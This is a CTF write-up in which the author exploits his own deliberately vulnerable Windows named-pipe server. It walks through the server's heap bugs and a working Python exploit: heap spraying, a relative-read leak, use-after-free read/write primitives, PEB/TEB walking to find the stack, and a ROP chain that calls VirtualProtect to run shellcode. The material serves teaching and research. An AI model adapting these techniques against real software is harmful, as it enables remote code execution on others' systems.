Heap CTF: LevelOne

This CTF mimics some of the real heap exploits I’ve seen and made. It aims to provide unique challenges while also not being overly contrived.

I’ve known of a handful of heap CTFs, which are documented on the resources page. However, none of them quite met my desires, so I decided to make my own. Specifically, I wanted less focus on direct heap structure manipulation. It seems to mostly be used during segment heap exploitation as a substitute for a good free or UAF primitive. As such, I wanted a heap CTF that involved some degree of heap spraying but little to no heap structure manipulation. Finally, I wanted to create a series of challenges that progressed in difficulty (hence the name of this challenge). As for whether I will ever get around to making more “levels”, I doubt it, but only time can tell.

With most modern heap exploits, there seem to be a few common patterns. Overflows, UAFs, type confusion, and overlapping objects (usually via a UAF) tend to be the most common vulnerabilities I’ve seen. As such, I wanted the challenge to reflect this. Furthermore, awkward limitations are a common occurrence. It seems as though every vulnerability has a unique obstacle in the way of exploitation. Most people are aware of bad bytes when dealing with strings, encodings, and data parsing. With heap exploitation, you’ll often have to deal with additional (often extraneous) allocations, which means grooming requires more nuance or tolerance. This is also a factor I wanted to include in the challenge.

The CTF can be found on my GitHub: https://github.com/0xZ0F/WindowsCTFs

The Target

This could be a fun reversing target; however, I wrote it, so I won’t pretend I reversed it from scratch. Instead, I’ll skip the reverse engineering and go straight to exploitation. First, though, here’s a brief overview of the target.

The target is a server listening on a named pipe: \\.\pipe\LevelOne. The server’s main purpose is handling key-value (KV) pairs, like a 2D array or a dictionary. A client can create, delete, retrieve, or modify keys and their values. Additionally, there is a user system. It’s more of a skeleton and doesn’t serve any real purpose; regardless, it’s there and will be exploited.

Each request is prefixed with the following header.

typedef struct {
	UINT32 Magic;		// PACKET_HEADER_MAGIC
	UINT32 Type;		// enum _PACKET_TYPES
	UINT32 DataSize;	// Not including header.
	GUID SessionID;
}PACKET_REQUEST_HEADER;

Relative Read Vulnerability

There is a relative read vulnerability when modifying an existing key’s value. Below is the vulnerable code.

typedef struct _KVDATABASE_ENTRY {
	UINT16 KeyLen;
	UINT32 ValueLen;
	CHAR* Key;
	CHAR* Value;
	struct _KVDATABASE_ENTRY* Flink;
	struct _KVDATABASE_ENTRY* Blink;
}KV_DATABASE_ENTRY;

if (pValue) {
	if (!uValueLen) {
		SetLastError(ERROR_INVALID_PARAMETER);
		return FALSE;
	}
	if (pValue[uValueLen - 1]) { uValueLen++; }

	CHAR* pNewValue = (CHAR*)HeapAlloc(pCtx->hHeap, HEAP_ZERO_MEMORY, uValueLen);
	if (!pNewValue) {
		return FALSE;
	}
	CopyMemory(pNewValue, pValue, uValueLen);

	if (!HeapFree(pCtx->hHeap, 0, pEntry->Value)) {
		HeapFree(pCtx->hHeap, 0, pNewValue);
		return FALSE;
	}

	pEntry->Value = pNewValue;
}

The bug here is due to the length field not being updated; however, it is later used when reading the key-value during a key-get request in HandleKeyGet(). This can be exploited by first creating a key with a large value, then modifying this key’s value with one of a smaller length. This creates a new allocation for the value; however, the length used when reading is still the old (larger) value. This allows for a relative read. This does not, however, provide any write primitive, so exploitation is not yet possible.

Use After Free (UAF) Vulnerability

A vulnerability exists within the username change functionality that allows for a UAF.

BOOL UserEntryUpdate(
	_In_ USER_DATABASE* pDb,
	_In_ USER_ENTRY* pEntry,
	_In_ CHAR* pUsername,
	_In_ UINT16 uUsernameLen
) {
	// First part of bug: Failure to check for uUsernameLen.
	if (!pDb || !pUsername) {
		SetLastError(ERROR_INVALID_PARAMETER);
		return FALSE;
	}

	HANDLE hHeap = GetProcessHeap();

	// Second part: The following is terrible code.
	// It can easily cause a UAF.

	if (uUsernameLen == pEntry->uUsernameLen) {
		CopyMemory(pEntry->pUsername, pUsername, uUsernameLen);
		return TRUE;
	}

	if (pEntry->pUsername) {
		if (!HeapFree(hHeap, 0, pEntry->pUsername)) {
			return FALSE;
		}
	}

	if (!uUsernameLen) {
		return FALSE;
	}

	pEntry->pUsername = (CHAR*)HeapAlloc(
		hHeap, HEAP_ZERO_MEMORY, uUsernameLen);
	if (!pEntry->pUsername) {
		return FALSE;
	}

	CopyMemory(pEntry->pUsername, pUsername, uUsernameLen);

	return TRUE;
}

If the username length provided is zero, then the username will be freed but never re-allocated. Additionally, the username pointer will not be set to NULL. As a result, by updating the username with one set to a length of zero, there is now a dangling pointer to a freed allocation. Unfortunately, there is no way to read the username from the server, so some creativity will be needed for exploitation.

There is an additional optimization within this function that is not immediately useful. If the length of the new username is the same as the old one, then instead of creating a new allocation it simply copies the new username over the old one.

Now to turn this into something more useful. The only value we can get out of this is to put something where the old username allocation was. Ideally, this would be a structure that contains useful pointers. Additionally, due to the optimization, if the old and new sizes match it should be possible to overwrite the overlapping structure. The general flow would be to allocate a username with a length equal to a useful data structure, free the username, allocate the data structure in that spot, then modify the username thus providing full control over the data structure. As for what structure to allocate, it should ideally be one that enables reading or writing arbitrary memory. Looking at the KV objects, they seem like a good candidate.

typedef struct _KVDATABASE_ENTRY {
	UINT16 KeyLen;
	UINT32 ValueLen;
	CHAR* Key;
	CHAR* Value;
	struct _KVDATABASE_ENTRY* Flink;
	struct _KVDATABASE_ENTRY* Blink;
}KV_DATABASE_ENTRY;

If it is possible to land this structure at the freed pointer, then we can modify the key or value fields. This would allow for both an arbitrary read and write by performing a get or modify operation on this key entry.

Part 1: Memory Leak/ASLR Bypass

First, enable the LFH, then leak some memory. The LFH can be enabled by creating some keys. The leak is done with the relative read: allocate a key with a large value, modify it with a smaller value, then read it back.

# Activate LFH
last_index = self.spray_keys(0x20, start_index=last_index)

self.send_create_key("RelativeRead", b"A" * 256)  # Size of relative read.
self.send_modify_key(
    "RelativeRead", b"B" * 39
)  # Put in the same bucket as keys. Server will add 1 for NULL.

# Spray for pointers.
last_index = self.spray_keys(0x40, start_index=last_index)

# This should show B and C (0x41 + 1 and 0x42 + 1 for NULL termination) in the dump.
# These are the lengths for the key structures.
_, dump = self.send_get_key("RelativeRead")
if dump is None:
    print("Exploit failed: could not get dump")
    return

It’s also important to point out that the smaller value length matters. The goal is to leak a pointer, and the KV structure has pointers within it. If the username length is the same as the KV structure size (40 bytes), then they will end up in the same LFH bucket. This means we can allocate several keys before and after allocating the smaller value to increase the chance of landing next to a key structure. The smaller value length in the code above is 39 bytes; this is because the server adds a NULL terminator, making it 40 bytes.

To further improve the leaked data, it’s a good idea to make sure it is actually a KV structure. In particular, the KV structure has two length fields. The length of both the key and value for the created keys is known. As such, the leak can be searched for the expected lengths.

canary = b"\x42\x00\x00\x00\x43\x00\x00\x00"
canary_pos = dump.find(canary)
if canary_pos == -1:
    print("Canary not found, exploit failed.")
    return
print(f"Canary found at offset {canary_pos:#x}")

dump = dump[canary_pos + len(canary) : canary_pos + len(canary) + 8]
leaked_address = int.from_bytes(dump, "little")
print(f"Leaked address: {leaked_address:#x}")

0x42 is the key length inside the spray_keys() function, and 0x43 is the length of the value. The spray_keys() function is very important. First, it creates KV pairs with a fixed length so they can be searched for. Second, keys must be unique, and by specifying the starting index for the allocations this can be maintained. The last eight characters of each key and value are the index (for example, AAAA...AAAA00000054 for the key).

Part 2: Absolute Read

The relative read doesn’t help much; we need an absolute read. This can be achieved through the username UAF: create a username that overlaps a KV structure, modify that KV to point to a desired address to read from, then read the KV pair. There are a few problems, however. In order to land a KV at the freed pointer, spraying will be needed. How do we know which key is overlapping with the username? Reading each key just returns its KV data, with no obvious difference between normal keys and the overlapping one. We can use the username modification optimization to modify the overlapping KV structure with a unique key or value—but what key, and what value? There are a couple of options; I’ll explain my solution. I used a leaked key pointer from the relative-read memory leak as the key pointer for the overlapping KV structure. For the value, I pointed it at KUSER_SHARED_DATA + 0x30 (0x7FFE0000 + 0x30), which is a pointer to the system directory (typically C:\Windows). Then I read all of the previously sprayed keys and look for one that returns C:\Windows. However, there is one additional step: keys are supposed to be unique, but now there are two entries with the same key pointer. If we search normally, we might always hit the original entry and never reach the modified one. So, when searching, for each key we request the value, check it, delete the key, request it again, and check it again.

username = "A" * 40  # 40 is the size of a key structure.
self.send_login(username)
self.send_change_username("")  # Free username pointer.
read_prim_guid = self.session_id

# Spray to reclaim freed username buffer
search_start = last_index
last_index = self.spray_keys(0x100, start_index=last_index)

# Change the username to point into KUSER_SHARED_DATA+0x30
# which should directly contain the string "C:\Windows".
search_value = "c:\\windows".encode("utf-16le")
buf = struct.pack(
    "<H2xLQQQQ",
    0x41,  # KeyLen
    len(search_value),  # ValueLen
    leaked_address,  # Key*
    0x7FFE0000 + 0x30,  # Value*
    0,
    0,
)
self.send_change_username(buf)

# Try to find which key got the overlapping allocation.
overlap_key = ""
print(f"Searching from {search_start} to {last_index}")
for x in range(last_index):
    # Since we are modifying the overlapped key with an existing key name,
    # the first attempt to find it may give the original key and value.
    # Delete and try again to find the modified key.
    for _ in range(2):
        key = b"X" * (0x41 - 8)
        value = b"Y" * (0x42 - 8)
        key += f"{x:08}".encode()
        value += f"{x:08}".encode()
        with contextlib.redirect_stdout(None):
            _, dump = self.send_get_key(key)
        if not dump:
            continue
        if search_value in dump.lower():
            overlap_key = key.decode()
            print(f"Found Windows path in key {overlap_key}:")
            hexdump(dump)
            break
        with contextlib.redirect_stdout(None):
            self.send_delete_key(key)
    if overlap_key:
        break
if not overlap_key:
    print("Failed to find overlapping key.")
    return

Fun fact: the capitalization of the C:\Windows string in KUSER_SHARED_DATA varies between systems.

Once the KV overlapping the user pointer is found, a reliable absolute read primitive can be created.

def read_addr(addr: int, size: int) -> bytes | None:
    """Read arbitrary memory at given address."""
    self.session_id = read_prim_guid
    buf = struct.pack(
        "<H2xLQQQQ",
        0x41,  # KeyLen - Must be 0x41 to prevent realloc.
        size,  # ValueLen
        leaked_address,  # Key* - Don't change this so it can be read from later.
        addr,  # Value*
        0,  # Flink
        0,  # Blink
    )
    with contextlib.redirect_stdout(None):
        self.send_change_username(buf)
    _, dump = self.send_get_key(overlap_key)
    return dump

Part 3: Absolute Write

Achieving an absolute write took a bit of thinking, but the solution is quite fun. My first idea was similar to the absolute read: create a UAF username with an overlapping key, overwrite the key pointers, then modify the key, which would ideally write to the address pointed to by the modified pointer. However, when a key/value is modified (only the value can be modified by a client), a new allocation is created. This means the pointer written to the overlapping key will not be used. We need an object that will write through an existing pointer without reallocating it. Username changes where the new length matches the previous length satisfy this requirement. So what if we create a username UAF with an overlapping USER_ENTRY?

typedef struct _USER_ENTRY {
	GUID guid;

	UINT16 uUsernameLen;
	CHAR* pUsername;

	struct _USER_ENTRY* Flink;
	struct _USER_ENTRY* Blink;
}USER_ENTRY;

Once the username pointer points to a USER_ENTRY, the username can be modified so that the USER_ENTRY points wherever we want. Then, modifying the username for that entry will cause a write to the desired address.

One slight obstacle is that this once again requires spraying. The solution used to overcome a similar problem in the absolute read won’t work here since we cannot read usernames from the server. While there may be a more elegant approach, I decided to keep it simple. To perform an absolute write, I just attempt to change every sprayed username.

# Spray usernames to trigger LFH bucket.
# 17 since LFH is already activated for other sizes (it would be 18 otherwise).
for x in range(17):
    with contextlib.redirect_stdout(None):
        self.send_login(f"SPRAY_USER_{str(x)}")

over_username = "Z" * 48  # Size of USER_ENTRY. No NULL appended.
self.send_login(over_username)
self.send_change_username("")
write_prim_guid = self.session_id
under_guids = []

# Under ideal circumstances, one of the first ones will reclaim the freed username buffer.
# However, assume we need to fill an entire UserBlock which will be 30-72 allocs.
# 30-72 was found through testing. 30 for the first UserBlock, 72 for the rest.
for x in range(72):
    # Each username must be 8 chars long, with the last 2 being the index.
    # This makes the writes 8 bytes.
    username = ("A" * 6) + f"{x:02}"
    with contextlib.redirect_stdout(None):
        self.send_login(username)
    under_guids.append(self.session_id)

def write_addr(addr: int, data: bytes) -> None:
    """Write arbitrary data to arbitrary address."""
    for x in range(72):
        self.session_id = write_prim_guid
        buf = struct.pack(
            "<16sH6xQQQ",
            under_guids[x].bytes,  # guid
            0x8,  # uUsernameLen
            addr,  # pUsername
            0,  # Flink
            0,  # Blink
        )
        with contextlib.redirect_stdout(None):
            self.send_change_username(buf)

        self.session_id = under_guids[x]
        with contextlib.redirect_stdout(None):
            self.send_change_username(data)

    self.session_id = write_prim_guid

Part 4: What to write, and where?

With the absolute read and write, we now have the highly coveted write-what-where capability. Now we need to know what to write, and where. The “what” is generally a stack pivot leading into a ROP chain, leading into shellcode. As for the “where”, we need to get creative again. There are no objects with function pointers and no vtables. An alternative is to overwrite a return address on the stack—but how do we find it? With the absolute read primitive, it is possible to read from the stack. The stack bounds can be found in the TEB, where offset 0x8 is StackBase and 0x10 is StackLimit. The stack base is the higher address (0x5000, for example), and the stack limit is the lower address (0x1000, for example). The stack grows from higher to lower addresses. I decided to search starting from the stack limit up toward the stack base, although the direction doesn’t really matter.

Next, which return address should we search for? It needs to be a return address from an earlier stack frame. See the following sample.

void HandleType1() {
	// Do stuff...
}

void HandleClient() {
	PACKET* pPacket = RecvFromClient();
	if (1 == pPacket->Type) {
		HandleType1();
	}
	// Other types ...
}

void Dispatcher() {
	while (true) {
		ListenForClient();
		HandleClient();
	}
}

void ServerMain() {
	InitializeServer();
	Dispatcher();
}

I’m defining “earlier” in the call stack as functions that were called first, and “later” as more recently called functions. In this case, ServerMain() is the earliest frame. Imagine a client is connected to the server and isn’t doing anything. The latest frame will be in HandleClient(), waiting for a packet from the client. As for which return address to overwrite to get execution, we can’t choose just any address. If HandleType1() was called earlier, then even if we’re currently waiting in RecvFromClient(), the return address for HandleType1() probably still exists somewhere on the stack. However, overwriting that return address won’t reliably lead to execution, because when HandleType1() is called again, the call instruction will overwrite the modified return address with the real one. All of this means that if we want to get execution, we need to overwrite a return address for HandleClient() going back to Dispatcher(), or a return address going from Dispatcher() to ServerMain().

Anyway, for this exploit, I had the best success overwriting the return address for HandleClient() called by StartServer().

Once the return address is overwritten, it should be a standard stack pivot and ROP chain process.

Part 5: Where to write.

To overwrite memory, we first need the address of the target. To get the stack address (so we can search for the return address), there is a long chain we must follow. This is the standard chain used to go from a heap address to other addresses, such as the main module base address.

To go from the leaked heap address (found in the initial relative read), we can use some masking and searching. For this exploit, I masked off the last 4 bytes of the leaked address to guess the heap base. If this was the heap base, then at offset 0x10 there would be the heap signature (0xffeeffee). If this signature was not found, I would subtract 0x10000 and try again.

heap_base = leaked_address & 0xFFFFFFFFFFFF0000
while True:
    print(f"Trying heap base: {heap_base:#x}")
    dump = read_addr(heap_base + 0x10, 4)
    if dump and b"\xee\xff\xee\xff" in dump:
        hexdump(dump)
        break
    heap_base -= 0x10000

print(f"Heap base: {heap_base:#x}")

It is possible to go from the heap base to the address of NTDLL. This is NTDLL-version dependent, so my exploit will likely not work on your system, as I only have offsets for my system and a test system. To overcome this, you’d have to test on many versions of Windows. Alternatively, you could do something similar to the heap base: mask off (or estimate) an offset, then do some guesswork looking for a valid PE signature. Anyway, within the _HEAP structure at offset 0x160 is the LockVariable field, which is a _HEAP_LOCK pointer. This is effectively a pointer to an _RTL_CRITICAL_SECTION. Within this structure is a field called DebugInfo which points into NTDLL. You can use this to derive the NTDLL base address.

"""
Heap+0x160 (LockVariable) points to a _RTL_CRITICAL_SECTION.
At offset 0 is the DebugInfo field, which is an offset from ntdll.
This will be version dependent. At the time of writing this is 0x1851f0.
"""
lock_variable_addr = heap_base + 0x160
dump = read_addr(lock_variable_addr, 8)
if not dump:
    print("Failed to read lock address.")
    return
lock_variable_addr = int.from_bytes(dump, "little")

dump = read_addr(lock_variable_addr, 8)
if not dump:
    print("Failed to read lock (critical section/debuginfo).")
    return
debug_info = int.from_bytes(dump, "little")
print(f"DebugInfo address: {debug_info:#x}")

# Try to determine ntdll base by checking each known offset
matched_offsets = None
ntdll_base = None
for offset_set in offsets.OFFSET_SETS:
    potential_ntdll = debug_info - offset_set.debug_info_offset
    print(
        f"Trying ntdll base: {potential_ntdll:#x} using offset set: {offset_set}"
    )
    # Check if last 5 bytes (20 bits) are 0
    if (potential_ntdll & 0xFFFF) == 0:
        ntdll_base = potential_ntdll
        matched_offsets = offset_set
        print(f"Matched offset set: {offset_set}")
        print(f"ntdll base address: {ntdll_base:#x}")
        break

if not ntdll_base or not matched_offsets:
    print("Failed to determine ntdll base with known offsets")
    return

As seen above, I use an offsets structure since there is one other weird offset we’ll use to find the PEB. The benefit of doing the above is that we can try many known offsets for DebugInfo, and if we get a match we can trust the rest of the offsets associated with that version of NTDLL.

The address of NTDLL will be useful; however, right now we’re trying to get the address of the stack, which is in the TEB. The address of the TEB can be derived from the address of the PEB. Weirdly, a pointer to _PEB+0x80 (TlsBitmapBits) can be found within NTDLL at a version-dependent fixed offset. This can be located with the following WinDBG command: s -q ntdll L1000000 @$peb+0x80. Once we know this offset, we can read it, take the retrieved value, and subtract 0x80. This will give us the PEB address. On x64, the TEB is typically at PEB+0x1000 in this setup. From there, we read the stack limit at TEB+0x10.

"""
A pointer to PEB+0x80 (TlsBitmapBits) exists at an offset in ntdll.
WinDBG: s -q ntdll L1000000 @$peb+0x80.
"""
tls_bitmap_bits_ptr = ntdll_base + matched_offsets.tls_offset
print(f"TlsBitmapBits pointer address: {tls_bitmap_bits_ptr:#x}")
dump = read_addr(tls_bitmap_bits_ptr, 8)
if not dump:
    print("Failed to read TlsBitmapBits pointer.")
    return
peb_address = int.from_bytes(dump, "little") - 0x80
print(f"PEB address: {peb_address:#x}")

teb_address = peb_address + 0x1000  # TEB = PEB + 0x1000 on x64
print(f"TEB address: {teb_address:#x}")

dump = read_addr(teb_address + 0x10, 8)  # StackLimit
if not dump:
    print("Failed to read StackLimit.")
    return
stack_limit = int.from_bytes(dump, "little")
print(f"StackLimit: {stack_limit:#x}")

Now to find the main module’s base address (as well as kernel32 and other modules, if we want). This can be done by walking the InLoadOrderModuleList within the PEB. The first module is the main module (the exe). The third is usually kernel32; however, this is not always the case (for example, with .NET executables). For this native binary, it should always be the third entry. PEB.Ldr.InMemoryOrderModuleList is a linked list using the normal _LIST_ENTRY structure. These entries are of type _LDR_DATA_TABLE_ENTRY. Offset 0x30 from the entry is DllBase.

dump = read_addr(peb_address + 0x18, 8)  # PEB_LDR_DATA
ldr_data_addr = int.from_bytes(dump, "little")
print(f"PEB_LDR_DATA address: {ldr_data_addr:#x}")

in_load_order_module_list = ldr_data_addr + 0x10
print(f"InLoadOrderModuleList address: {in_load_order_module_list:#x}")

dump = read_addr(in_load_order_module_list, 8)
first_data_table_entry_addr = int.from_bytes(dump, "little")

# _LDR_DATA_TABLE_ENTRY+0x30
dump = read_addr(first_data_table_entry_addr + 0x30, 8)
exe_base = int.from_bytes(dump, "little")
print(f"Executable base address: {exe_base:#x}")

# Kernel32 is the third module loaded (for this exe).
dump = read_addr(first_data_table_entry_addr, 8)
second_data_table_entry_addr = int.from_bytes(dump, "little")
print(
    f"Second LDR_DATA_TABLE_ENTRY address: {first_data_table_entry_addr:#x}, next: {second_data_table_entry_addr:#x}"
)

dump = read_addr(second_data_table_entry_addr, 8)
third_data_table_entry_addr = int.from_bytes(dump, "little")
print(
    f"Third LDR_DATA_TABLE_ENTRY address: {second_data_table_entry_addr:#x}, next: {third_data_table_entry_addr:#x}"
)

dump = read_addr(third_data_table_entry_addr + 0x30, 8)
kernel32_base = int.from_bytes(dump, "little")
print(f"Kernel32 base address: {kernel32_base:#x}")

Finally, we can search for the return address.

# Search stack for a return address in an outer stack frame.
target_ret = exe_base + 0x14572
print(f"Looking for return address for HandleClient(): {target_ret:#x}")

stack_ptr = stack_limit
found_ret_addr = False
while stack_ptr < stack_limit + 0x4000:
    dump = read_addr(stack_ptr, 8)
    if not dump:
        stack_ptr += 8
        continue

    value = int.from_bytes(dump, "little")
    if not value:
        stack_ptr += 8
        continue

    # if (value & 0xFFFFFFFFFFFFF000) == (key_get_addr & 0xFFFFFFFFFFFFF000):
    if value == target_ret:
        print(f"Found {value:#x} at stack address: {stack_ptr:#x}")
        found_ret_addr = True
        break
    stack_ptr += 8

if not found_ret_addr:
    print("Failed to find return address on stack.")
    return

Part 6: What, exactly, to write.

Now that we know where to write, we need to decide exactly what to write. We can overwrite a return address, but where do we go from there? Also, how do we get any shellcode executed? Debugging shows that none of the registers contain anything useful, so we need to pivot the stack. Ideally, we can place a ROP chain in memory via an allocation (such as some KV data), get the address of that allocation, overwrite the return address with a pivot to it, then proceed with ROP as normal. It’s easy enough to create an allocation containing a ROP chain by creating a KV. The hard part is getting the address and pivoting reliably.

First of all, how do we get the address of our ROP allocation? We can do what we did at the start with the relative read and memory leak. Create an object used for relative reads, spray allocations with ROP gadgets, perform a relative read, pull out the pointer, then use that for the address of the stack pivot.

Now with the address of a ROP allocation, the stack can be pivoted to that allocation. From there, the standard ROP chain leading to VirtualProtect() can be performed. One more step I took was to restore the original stack after VirtualProtect(). This prevents the memory being executed from also being used as the stack, and it also helps prevent the application from crashing when the shellcode returns. The final pivot and ROP are a bit hard to explain here; it took some debugging and tweaking to get something that didn’t crash. I found that I couldn’t write too much around the return address, otherwise the process would crash early. Anyway, here’s the final phase leading to execution.

# Create and get the address of the rop/shellcode object(s).
self.send_create_key("RelativeRead2", b"A" * 512)  # Size of relative read.
self.send_modify_key(
    "RelativeRead2", b"B" * 39
)  # Put in the same bucket as keys. Server will add 1 for NULL.

### --- Spray rop/shellcode --- ###
pop_rsp_ret = ntdll_base + 0x162B3
pop_rcx_ret = ntdll_base + 0x91C09
pop_rdx_ret = ntdll_base + 0xF121B
pop_r8_ret = ntdll_base + 0x66F4B
pop_r9_r10_r11_ret = ntdll_base + 0x8F0B4
add_rsp_28_ret = exe_base + 0x16405
push_rsp_ret = ntdll_base + 0xD96E
virtual_protect = kernel32_base + 0x15470

"""
BOOL VirtualProtect(
    [in]  LPVOID lpAddress,
    [in]  SIZE_T dwSize,
    [in]  DWORD  flNewProtect,
    [out] PDWORD lpflOldProtect
);
"""

# RCX = &thisAlloc
rop = b""

# RDX = Size (0x1000)
rop += struct.pack("<Q", pop_rdx_ret)
rop += struct.pack("<Q", 0x1000)

# R8 = 0x40 = PAGE_EXECUTE_READWRITE
rop += struct.pack("<Q", pop_r8_ret)
rop += struct.pack("<Q", 0x40)

# R9 = lpflOldProtect (leaked_address)
rop += struct.pack("<Q", pop_r9_r10_r11_ret)
rop += struct.pack("<Q", stack_ptr + 0x10)
rop += struct.pack("<Q", 0)  # Into R10
rop += struct.pack("<Q", 0)  # Into R11

# Call VirtualProtect
rop += struct.pack("<Q", virtual_protect)
rop += struct.pack(
    "<Q", add_rsp_28_ret
)  # Skips what should've been VirtualAlloc()'s shadow space (and +0x8 more).
rop += b"\xaa" * 0x28
rop += struct.pack("<Q", push_rsp_ret)  # Begin executing the stack.

"""
Pivot the stack back and restore the return address.
0x111... is the original stack address (the location on the stack of the return address).
0x222... is the original return address.

48:BC 1111111111111111   | mov rsp,1111111111111111
48:B9 2222222222222222   | mov rcx,2222222222222222
48:890C24                | mov qword ptr ss:[rsp],rcx
"""
rop += b"\x48\xbc"
rop += struct.pack("<Q", stack_ptr)
rop += b"\x48\xb9"
rop += struct.pack("<Q", target_ret)
rop += b"\x48\x89\x0c\x24"

shellcode = b"\x90" * 32  # Not needed for this ROP chain.
shellcode += SHELLCODE_NO_THREAD

stage_0 = rop + shellcode

for x in range(100):
    with contextlib.redirect_stdout(None):
        key_name = f"Shellcode{x:#04}".encode()
        self.send_create_key(key_name, stage_0)

_, dump = self.send_get_key("RelativeRead2")
if dump is None:
    print("Exploit failed: could not get dump")
    return

# 14 = len(key_name) + 1 for NULL
canary = struct.pack("<LL", 14, len(stage_0) + 1)
hexdump(canary)
canary_pos = dump.find(canary)
if canary_pos == -1:
    print("Canary not found in RelativeRead2, exploit failed.")
    return
print(f"Canary found at offset {canary_pos:#x} in RelativeRead2")

dump = dump[canary_pos + len(canary) + 8 : canary_pos + len(canary) + 16]
rop_alloc_addr = int.from_bytes(dump, "little")
print(f"RopAlloc address: {rop_alloc_addr:#x}")

write_addr(
    stack_ptr + 0x0, struct.pack("<Q", pop_rcx_ret)
)  # pop "garbage" at +8
# Don't touch +8, it will crash.
write_addr(
    stack_ptr + 0x10, struct.pack("<Q", pop_rcx_ret)
)  # RCX = rop_alloc_addr (first param for VirtualAlloc)
write_addr(stack_ptr + 0x18, struct.pack("<Q", rop_alloc_addr))
write_addr(stack_ptr + 0x20, struct.pack("<Q", pop_rsp_ret))  # Pivot.
write_addr(stack_ptr + 0x28, struct.pack("<Q", rop_alloc_addr))
# Ret addr will be restored by ROP/shellcode.

input("Exploit setup, press Enter to trigger...")

# Trigger by disconnecting.

The shellcode in this case was custom shellcode written to call MessageBoxA() in a new thread. This ROP chain is also very dependent on NTDLL, so again, this exploit will not work for you unless our versions of NTDLL match. Ideally you’d only use gadgets within the exe; however, due to the small size, I don’t think there are enough gadgets within the exe to make a full ROP chain—not without losing your mind. Once you need one gadget from another library, you might as well use more gadgets from that library, since it makes the ROP process much easier.

Conclusion

The final exploit relies more heavily on NTDLL than I would like; however, without planting fake gadgets within the exe there isn’t another good option. Additionally, resolving other addresses is already reliant on NTDLL, so you might as well use it for the ROP too. I’d like to see a better way to get execution that isn’t so NTDLL-version dependent, but that’s for another time.

Hopefully this was useful; I found it to be quite a fun challenge. There were issues encountered throughout the process, and nothing was straightforward. There was always an obstacle to overcome, which is why I enjoyed this challenge so much. It felt more realistic than some of the other CTFs I’ve done, but I’m biased. I doubt anyone will take this challenge on, but if you do, let me know if you found something I didn’t!